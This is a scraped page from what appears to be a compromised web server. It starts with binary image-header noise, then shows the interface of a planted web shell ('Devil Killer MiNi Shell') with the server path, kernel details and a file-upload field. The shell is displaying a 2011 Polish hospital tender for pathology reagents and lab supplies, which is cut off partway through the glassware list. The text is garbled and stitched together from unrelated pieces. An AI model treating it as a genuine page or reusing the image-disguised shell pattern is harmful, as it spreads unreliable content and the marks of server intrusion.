JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110505/100514-N-2011.html

<p class="kh_header"><b>Radom: Zakup i dostawa odczynników oraz jednorazowego sprzętu medycznego dla potrzeb Zakładu Patomorfologii Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 100514 - 2011; data zamieszczenia: 05.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa odczynników oraz jednorazowego sprzętu medycznego dla potrzeb Zakładu Patomorfologii Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa odczynników oraz jednorazowego sprzętu medycznego dla potrzeb Zakładu Patomorfologii Radomskiego Szpitala Specjalistycznego
wg n/w asortymentu:

Cześć nr 1 - Odczynniki do badań histopatologicznych manualnych i do procesora tkankowego LEICA TP 1020
Orientacyjne zapotrzebowanie na okres 24 m-cy
L.p.	Opis	Ilość
1.	Ksylen	800  l
2.	Aceton	300  l
3.	Fenol	150  l
4.	Formaldehyd  r-r 40%                  	60 kg
5.	Spirytus 95%                                	24  l
6.	Alkohol skażony	1600  l
7.	Alkohol etylowy 99,8 %	8  l
8.	Parafina sypka	 2400 kg
9.	Target Retrieral Solution - 10 x Concentrate                                  lub równoważny	1000 ml
10.	Tween                                                                                               lub równoważny	200 ml
11.	Dual Endogenous Enzyme Blok                                                      lub równoważny	60 ml
12.	En Vision System HPR Labelled Polymer Anti-mouse                   lub równoważny	60 ml
13.	Liguid DAB+ Substrate Chromogen System                                   lub równoważny	60 ml
14.	TBS                                                                                                  lub równoważny	323 g
15.	Monoclonal Mouse Anti-Human Progesteron Receptor	44 ml
16.	Monoclonal Mouse Anti-Human Estrogen Receptor	48 ml
17.	Hematoksylina Hayera	1000 ml
18.	Hematoksylina (Subst.)	600 g
19.	Eozyna (subst.)	50 g
20.	Tlenek rtęci	50 g
21.	Chlorek rtęci	10 g
22.	Kwas octowy	2 l
23.	Kwas solny	2 l
24.	Amoniak	1000 ml
25.	Ałun glinowo-Amonowy	2000 g
26.	Azotan srebra	20 g
27.	Fuksyna kwaśna	10 g
28.	Fuksyna zasadowa	10 g
29.	Pirosiarczyn sodu	20 g
30.	Karmin 	10 g
31.	Bezwodny chlorek glinu	4 g
32.	Tiosiarczan sodu 	20 g
33.	Nadmanganian potasu	100 g
34.	Błękit anilinowy	4 g
35.	Ponceau Xylidine	4 g
36.	Kwas fosforowo-molibdenowy	10 g
37.	Kwas nadjodowy	40 g
38.	Rezorcyna 	4 g
39.	Chlorek żelaza	4 g
40.	Tiomina	4 g
41.	Czerwień olejowa	4 g
42.	Czerwień Siriusa	10 g
43.	Merckofix spray fixative	200 ml
44.	Olej parafinowy	2 l
45.	Para Gasol	200 ml
46.	Medium do zamykania preparatów	20 l
47.	Medium do kriostatu Tissue Freezing	2 op.
48.	Zieleń świetlna 	10 g
49.	Pirosiarczyn potasu	20 g
55.	Siarczan amonowo-żelazowy	20 g
51.	Boraks	10 g
52.	Urotropina 	20 g
53.	Płyn Lugola	1000 ml
54.	Toluen	2 000 ml
55.	Fuksyna karbolowa 	20 g
56.	Wodorotlenek potasu	50 g
57.	Kwas fosforowo-wolframowy	20 g
58.	Dwuchromian potasu	20 g
59.	Karmin litu	10 g
60.	Siarczyn sodu	200 g
61.	Kwas pikrynowy	20 g
62.	Gliceryna	2 000 ml
63.	Zieleń metylowa	4 g
64.	Chlorek złota	2 g
65.	Hydrochinion	20 g
66.	Pyronin Y	50 g
67.	Kwas chromowy	100 g
68.	Kwas fosforowolframowy	200 g
69.	Anilina czda	200 ml
70.	Azokarmin G	20g
71.	Oranż G	50 g
72.	Błękit alcjanowy	20 g

Cześć nr 2 -  Noże
Orientacyjne zapotrzebowanie na okres 24 m-cy

L.p.	Opis	Ilość
1.	Noże do mikrotomów saneczkowych         
-	Leica SM 2000R
-	Leica HM430              
-	Jung histoslide 2000                     1op=50szt	100 op
2.	Noże do kriostatu LEICA CM 1900         1op=50szt	4 op

Cześć nr 3 - Kasetki  i inne
Orientacyjne zapotrzebowanie na okres 24 m-cy

L.p.	Opis	Ilość
szt.
1.	Kasetka biopsyjna
Otwory o wym. 0,35 mm, jedna komora wewnętrzna wyraźnie oddzielona od pozostałych części kasetki, konieczne dodatkowe otwory zapewniające swobodny przepływ parafiny.	24 000
2.	Kasetki histopatologiczne
62 otwory kwadratowe wym. 2x2 mm do przepływu parafiny, otwór mocujący przykrywkę 12,5 mm, wym. zew. 6 x 28 x 40,5 mm	60 000
3.	Markery do opisywania kasetek	40
4.	Metalowe przykrywki do kasetek
62 okrągłe otwory do przepływu parafiny o śr. 2 mm, zaczep mocujący kasetkę 12,5 mm, wym. 4 x 27,5 x 39,5 mm	200

Cześć nr 4 - Materiały szklane jednorazowe i inne
Orientacyjne zapotrzebowanie na okres 24 m-cy
L.p.	Opis	Ilość
1.	Bibuła filtracyjna	30 op.
2. 	Cylinder szklany poj. 10 ml zwykły szklany	4 szt.
3.	Cylinder szklany poj. 100 ml zwykły szklany	2 szt.
4.	Cylinder szklany poj. 250 ml zwykły szklany	2 szt.
5.	Kolby poj.1000 ml zwykłe szklane	4 szt.
6.	Kolby poj.2000 ml zwykłe szklane	4 szt.
7.	Końcówki do pipet automatycznych poj. do 1000 ?l	500 szt.
8.	Końcówki do pipet automatycznych poj. do 5000 ?l	500 szt.
9.	Lejki szklane śr. 10 cm zwykłe szklane	10 szt.
10.	Lejki szklane śr. 20 cm zwykłe szklane	10 szt.
11.	Barwiacz do szkiełek, wym. zew. 90x74mm, wym. wew. 80 x 62mm	20 szt.
12.	Pisaki do szkła	40 szt.
13.	Płytki Petriego śr.10 cm	40 szt.
14.	Pudełka tekturowe 83 x 83 x 30 mm z pokrywką	8 000 szt.
15.	Szkiełka nakrywkowe  24 x 24	20 000 szt.
16.	Szkiełka nakrywkowe  32 x 24	20 000 szt.
17.	Szkiełka nakrywkowe  50 x 24	20 000 szt.
18.	Szkiełka nakrywkowe  60 x 24	20 000 szt.
19.	Szkiełka podstawowe szlif jednostronny	120 000 szt.
20.	Szkiełka silanizowane szlif jednostronny	400 szt.
21.	Zlewki poj. 150 ml zwykłe szklane	40 szt.
22.	Zlewki poj. 2000 ml zwykłe szklane	4 szt.
23.	Zlewki poj. 250 ml zwykłe szklane	20 szt.
24.	Zlewki poj. 50 ml zwykłe szklane	100 szt.
25.	Zlewki poj. 600 ml zwykłe szklane	20 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8, 33.14.14.10-4, 33.14.10.00-0, 30.19.21.25-3, 33.79.30.00-5, 38.43.71.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, 
że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
w tym okresie, wykonał dostawy oferowanego towaru: 
Dla części nr 1 - na kwotę min. 50.000,00 PLN,
Dla części nr 2 - na kwotę min.   9.000,00 PLN,
Dla części nr 3-  na kwotę min.    7.000,00 PLN,
Dla części nr 4 -  na kwotę min. 16.000,00 PLN
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.	Wypełniony formularz oferty
3.	Wypełniony formularz cenowy /zgodnie z oferowaną częścią/.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian. 
b)	Zamawiający dopuszcza zmianę cen jednostkowych brutto określonych w formularzu cenowym po roku obowiązywania umowy, jednak nie częściej niż raz w roku, w oparciu o wskaźnik waloryzacji cen towarów i usług konsumpcyjnych ogłoszonych przez GUS za ostatni kwartał poprzedzający wprowadzenie tej zmiany.
c)	Przedmiotem zmian treści umowy mogą być również zmiany adresowe  lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2011 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4, pok. 308 lub 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odczynniki do badań histopatologicznych manualnych i do procesora tkankowego LEICA TP 1020.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 1 - Odczynniki do badań histopatologicznych manualnych i do procesora tkankowego LEICA TP 1020
Orientacyjne zapotrzebowanie na okres 24 m-cy
L.p.	Opis	Ilość
1.	Ksylen	800  l
2.	Aceton	300  l
3.	Fenol	150  l
4.	Formaldehyd  r-r 40%                  	60 kg
5.	Spirytus 95%                                	24  l
6.	Alkohol skażony	1600  l
7.	Alkohol etylowy 99,8 %	8  l
8.	Parafina sypka	 2400 kg
9.	Target Retrieral Solution - 10 x Concentrate                                  lub równoważny	1000 ml
10.	Tween                                                                                               lub równoważny	200 ml
11.	Dual Endogenous Enzyme Blok                                                      lub równoważny	60 ml
12.	En Vision System HPR Labelled Polymer Anti-mouse                   lub równoważny	60 ml
13.	Liguid DAB+ Substrate Chromogen System                                   lub równoważny	60 ml
14.	TBS                                                                                                  lub równoważny	323 g
15.	Monoclonal Mouse Anti-Human Progesteron Receptor	44 ml
16.	Monoclonal Mouse Anti-Human Estrogen Receptor	48 ml
17.	Hematoksylina Hayera	1000 ml
18.	Hematoksylina (Subst.)	600 g
19.	Eozyna (subst.)	50 g
20.	Tlenek rtęci	50 g
21.	Chlorek rtęci	10 g
22.	Kwas octowy	2 l
23.	Kwas solny	2 l
24.	Amoniak	1000 ml
25.	Ałun glinowo-Amonowy	2000 g
26.	Azotan srebra	20 g
27.	Fuksyna kwaśna	10 g
28.	Fuksyna zasadowa	10 g
29.	Pirosiarczyn sodu	20 g
30.	Karmin 	10 g
31.	Bezwodny chlorek glinu	4 g
32.	Tiosiarczan sodu 	20 g
33.	Nadmanganian potasu	100 g
34.	Błękit anilinowy	4 g
35.	Ponceau Xylidine	4 g
36.	Kwas fosforowo-molibdenowy	10 g
37.	Kwas nadjodowy	40 g
38.	Rezorcyna 	4 g
39.	Chlorek żelaza	4 g
40.	Tiomina	4 g
41.	Czerwień olejowa	4 g
42.	Czerwień Siriusa	10 g
43.	Merckofix spray fixative	200 ml
44.	Olej parafinowy	2 l
45.	Para Gasol	200 ml
46.	Medium do zamykania preparatów	20 l
47.	Medium do kriostatu Tissue Freezing	2 op.
48.	Zieleń świetlna 	10 g
49.	Pirosiarczyn potasu	20 g
55.	Siarczan amonowo-żelazowy	20 g
51.	Boraks	10 g
52.	Urotropina 	20 g
53.	Płyn Lugola	1000 ml
54.	Toluen	2 000 ml
55.	Fuksyna karbolowa 	20 g
56.	Wodorotlenek potasu	50 g
57.	Kwas fosforowo-wolframowy	20 g
58.	Dwuchromian potasu	20 g
59.	Karmin litu	10 g
60.	Siarczyn sodu	200 g
61.	Kwas pikrynowy	20 g
62.	Gliceryna	2 000 ml
63.	Zieleń metylowa	4 g
64.	Chlorek złota	2 g
65.	Hydrochinion	20 g
66.	Pyronin Y	50 g
67.	Kwas chromowy	100 g
68.	Kwas fosforowolframowy	200 g
69.	Anilina czda	200 ml
70.	Azokarmin G	20g
71.	Oranż G	50 g
72.	Błękit alcjanowy	20 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cześć nr 2 -  Noże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 2 -  Noże
Orientacyjne zapotrzebowanie na okres 24 m-cy

L.p.	Opis	Ilość
1.	Noże do mikrotomów saneczkowych         
-	Leica SM 2000R
-	Leica HM430              
-	Jung histoslide 2000                     1op=50szt	100 op
2.	Noże do kriostatu LEICA CM 1900         1op=50szt	4 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć nr 3 - Kasetki  i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 3 - Kasetki  i inne
Orientacyjne zapotrzebowanie na okres 24 m-cy

L.p.	Opis	Ilość
szt.
1.	Kasetka biopsyjna
Otwory o wym. 0,35 mm, jedna komora wewnętrzna wyraźnie oddzielona od pozostałych części kasetki, konieczne dodatkowe otwory zapewniające swobodny przepływ parafiny.	24 000
2.	Kasetki histopatologiczne
62 otwory kwadratowe wym. 2x2 mm do przepływu parafiny, otwór mocujący przykrywkę 12,5 mm, wym. zew. 6 x 28 x 40,5 mm	60 000
3.	Markery do opisywania kasetek	40
4.	Metalowe przykrywki do kasetek
62 okrągłe otwory do przepływu parafiny o śr. 2 mm, zaczep mocujący kasetkę 12,5 mm, wym. 4 x 27,5 x 39,5 mm	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 30.19.21.25-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cześć nr 4 - Materiały szklane jednorazowe i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 4 - Materiały szklane jednorazowe i inne
Orientacyjne zapotrzebowanie na okres 24 m-cy
L.p.	Opis	Ilość
1.	Bibuła filtracyjna	30 op.
2. 	Cylinder szklany poj. 10 ml zwykły szklany	4 szt.
3.	Cylinder szklany poj. 100 ml zwykły szklany	2 szt.
4.	Cylinder szklany poj. 250 ml zwykły szklany	2 szt.
5.	Kolby poj.1000 ml zwykłe szklane	4 szt.
6.	Kolby poj.2000 ml zwykłe szklane	4 szt.
7.	Końcówki do pipet automatycznych poj. do 1000 ?l	500 szt.
8.	Końcówki do pipet automatycznych poj. do 5000 ?l	500 szt.
9.	Lejki szklane śr. 10 cm zwykłe szklane	10 szt.
